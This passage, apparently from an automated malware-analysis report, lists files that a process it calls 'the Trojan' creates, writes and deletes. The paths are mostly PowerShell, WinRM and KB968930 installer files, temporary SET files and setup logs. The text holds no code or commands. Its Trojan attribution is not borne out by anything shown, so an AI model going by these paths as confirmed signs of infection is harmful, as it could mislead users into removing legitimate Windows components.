C:\82ea8d5099742dc8f49f42\diagnostics.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_script_blocks.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsman.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_trap.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_job_details.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\spupdsvc.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\winrsmgr.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\windowsremotemanagement.adm (0 bytes)
C:\82ea8d5099742dc8f49f42\about_logical_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_preference_variables.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_arithmetic_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_redirection.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_parameters.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\update\eula.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmsvc.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_locations.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\pssetupnativeutils.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_script_internationalization.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_jobs.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_ise.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_return.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe.mui (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\pwrshplugin.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\dotnettypes.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.runtime.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_language_keywords.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\windowspowershellhelp.chm (0 bytes)
C:\82ea8d5099742dc8f49f42\about_comparison_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_transactions.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_pssnapins.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_jobs.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\powershelltrace.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_execution_policies.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_automatic_variables.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_throw.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_eventlogs.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_requirements.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_aliases.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_escape_characters.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_faq.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\winrm.ini (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\update\spcustom.dll (0 bytes)
The process ngen.exe:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1088 bytes)
The process ngen.exe:2904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (470 bytes)
The process ngen.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)
The process ngen.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)
The process ngen.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1412 bytes)
The process ngen.exe:2960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1168 bytes)
The process ngen.exe:1816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:2520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (784 bytes)
The process ngen.exe:2484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1098 bytes)
The process ngen.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (768 bytes)
The process ngen.exe:2348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:3020 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (730 bytes)
The process ngen.exe:2500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (754 bytes)
The process ngen.exe:2444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1178 bytes)
The process ngen.exe:2580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (810 bytes)
The process ngen.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (864 bytes)
The process ngen.exe:784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (762 bytes)
The process ngen.exe:2992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1090 bytes)
The process ngen.exe:2492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1434 bytes)
The process ngen.exe:2412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)
The process ngen.exe:2372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)
The process ngen.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1124 bytes)
The process ngen.exe:2512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (452 bytes)
The process update.exe:2828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5302 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (137010 bytes)
%WinDir%\comsetup.log (49590 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242961 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
The Trojan deletes the following file(s):
%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
